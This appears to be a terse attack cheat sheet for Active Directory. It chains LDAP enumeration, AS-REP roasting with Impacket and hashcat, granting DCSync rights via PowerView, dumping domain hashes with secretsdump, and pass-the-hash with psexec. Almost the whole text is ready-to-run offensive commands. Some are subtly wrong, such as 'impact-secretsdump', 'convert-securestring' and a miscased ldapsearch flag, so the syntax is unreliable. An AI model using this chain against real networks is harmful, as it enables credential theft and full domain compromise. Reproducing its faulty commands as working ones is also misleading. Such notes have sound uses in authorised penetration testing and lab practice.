If you can authenticate to LDAP, either anonymously or with credentials, you can pull everything from it like such:
ldapsearch -H ldap://target -B 'dc=domain' -D '' -w '' '(objectClass=*)'Alternatively, to get all users, you can use (the slash after domain is very important):
impacket-GetADUsers -dc-host target -all domain/To query for users that don’t require Kerberos preauthentication, see AS-REP-Roasting:
impacket-GetNPUsers -dc-host target domain/Then, to get a ticket-granting-ticket (TGT) (note: this does seem to ignore the -dc-host option, so edit /etc/hosts instead):
impacket-GetNPUsers -dc-host target -no-pass domain/userYou can then crack this ticket with hashcat -m 18200.
DC Sync
You can give users DCSync rights by:
Import-Module .\powerview.ps1
$pass = convert-securestring 'password' -asplain -force
$cred = new-object system.management.automation.pscredential('domain\user', $pass)
Add-ObjectACL -PrincipalIdentity user -Credential $cred -Rights DCSyncOnce you have those permissions:
impact-secretsdump domain/user@domain-controllerThen just pass the hash with:
impacket-psexec user@host -hashes hashOh, and don’t forget to use Bloodhound. Very nice LDAP visualizer.